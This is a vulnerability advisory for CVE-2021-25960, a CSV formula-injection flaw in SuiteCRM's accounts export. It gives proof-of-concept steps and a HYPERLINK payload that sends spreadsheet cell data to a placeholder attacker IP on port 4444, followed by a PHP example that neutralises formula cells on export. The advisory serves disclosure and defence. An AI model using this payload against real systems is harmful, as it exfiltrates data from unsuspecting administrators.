CVE-2021-25960
Date: September 29, 2021
Overview
In the “SuiteCRM” application, versions v7.11.18 through v7.11.19 and v7.10.29 through v7.10.31 are affected by a “CSV Injection” (Formula Injection) vulnerability. A low privileged attacker can use the accounts module to inject payloads in the input fields. When an administrator accesses the accounts module to export the data as a CSV file and opens it, the payload gets executed. This was not fixed properly as part of CVE-2020-15301, allowing the attacker to bypass the security measure.
Details
The application “SuiteCRM” is affected by a “CSV Injection” (Formula Injection) vulnerability. A low privileged user (attacker) can use the accounts module to inject payloads in the input fields. When an administrator accesses the accounts module to export the data as a CSV file and opens it, the payload gets executed.
PoC Details
For demonstration purposes we'll use 2 users:
1. Alice - low privileged user
2. Admin - administrator
Log in to the application as Alice and go to the accounts module. Now in the first name field, insert the CSV injection payload.
Start listener on port 4444.
Then log in to the application as Admin and navigate to the accounts module. Select the fields and under Bulk Action click on export. A CSV file will be downloaded. Open it with Excel.
When Admin clicks on the first column that contains the payload, it gets executed and the data in cells A3 & B3 will be sent to Alice’s address.
PoC Code
==HYPERLINK("http://attacker-ip:4444?x="&A3&B3,"Click Here")
Affected Environments
v7.11.18 - v7.11.19 and v7.10.29 - v7.10.31
Prevention
Upgrade to version v7.10.32, v7.11.21 or higher
Language: PHP
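The export-side mitigation for this class of bug, as an added example (not SuiteCRM's code or its actual patch): cells are neutralised rather than stripped, because a filter that removes a single leading `=` leaves the doubled `==` payload shape from the PoC as a live formula. `strip_once`, `neutralise_cell`, `export_row` and the sample rows are hypothetical; the trigger set follows OWASP's CSV injection guidance.

```php
<?php
// Added example, not SuiteCRM code. Function names and rows are constructed.

// Leading characters that make a spreadsheet evaluate a cell as a formula
// (the set listed in OWASP's CSV injection guidance).
const FORMULA_TRIGGERS = "=+-@\t\r";

// Hypothetical incomplete filter: removes one leading '=' and nothing else.
function strip_once(string $cell): string
{
    return ($cell !== '' && $cell[0] === '=') ? substr($cell, 1) : $cell;
}

// Neutralise instead of stripping: when the first non-space character is a
// trigger, prefix an apostrophe so the cell is shown as text. Skipping leading
// spaces is a conservative choice in case an importer trims them.
function neutralise_cell(string $cell): string
{
    $trimmed = ltrim($cell, ' ');
    if ($trimmed !== '' && strpos(FORMULA_TRIGGERS, $trimmed[0]) !== false) {
        return "'" . $cell;
    }
    return $cell;
}

// Write one row with every cell neutralised; fputcsv handles quoting.
function export_row($handle, array $row): void
{
    fputcsv($handle, array_map('neutralise_cell', $row), ',', '"', '');
}

// Constructed rows; the second reuses the payload shape from the PoC above.
$rows = [
    ['Acme Ltd', 'alice@example.com'],
    ['==HYPERLINK("http://attacker-ip:4444?x="&A3&B3,"Click Here")', 'x@example.com'],
    ['  +1-555-0100', '@handle'],
];

$out = fopen('php://output', 'w');
foreach ($rows as $row) {
    // Show what the incomplete filter would have let through.
    printf("strip_once leaves: %s\n", strip_once($row[0]));
    export_row($out, $row);
}
fclose($out);
```

Prefixing also changes legitimate values that start with `-` or `+`, such as negative numbers, so apply it to free-text fields or accept the altered rendering. The empty `escape` argument to `fputcsv` requires PHP 7.4 or later.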
Good to know:
Base Score: | |
---|---|
Attack Vector (AV): | Network |
Attack Complexity (AC): | Low |
Privileges Required (PR): | Low |
User Interaction (UI): | Required |
Scope (S): | Unchanged |
Confidentiality (C): | High |
Integrity (I): | High |
Availability (A): | High |
Base Score: | |
---|---|
Access Vector (AV): | Network |
Access Complexity (AC): | Medium |
Authentication (AU): | Single |
Confidentiality (C): | Partial |
Integrity (I): | Partial |
Availability (A): | Partial |